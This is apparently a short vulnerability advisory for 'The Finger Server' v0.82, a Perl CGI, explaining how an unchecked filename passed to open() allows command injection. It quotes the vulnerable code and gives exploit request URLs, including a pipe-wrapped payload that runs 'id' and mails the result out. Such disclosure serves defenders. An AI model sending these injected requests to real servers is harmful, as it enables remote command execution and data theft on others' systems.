Vulnerability

    "The Finger Server"

Affected

    "The Finger Server"

Description

    Iain  Wade  found  following.   In  1999.  he was tinkering w/ The
    Finger  Server  v0.82  and  came  across  some  bugs which let you
    execute shell  commands under  the privileges  of the  web server.
    It's available at

        http://www.glazed.org/finger/

    It's just another case of perl doing it's magic on an open() call.
    There  is  undoubtably  other  problems,  but here's the offending
    code exploited here is:

        open (PLANS, "$plan_path$filename") ||
                do { print "Can't open $plan_path$filename: $!";
                     return;
                   };

    It is called with the following arguments;

        finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan

    It does minimal checking before there, really only making sure the
    username is valid, but for example by using:

        finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|<shellcode>|

    you can execute whatever...  The  output will not get to you  (the
    web client)  obviously if  you use  |<shell command>|  .. it  does
    however get executed...  So an example to test it could be

        |id|mail+email@address|

    Surrounding  it  in  pipes  is  the  only  way one could get it to
    execute, otherwise it would return open errors ..

Solution

    Nothing yet.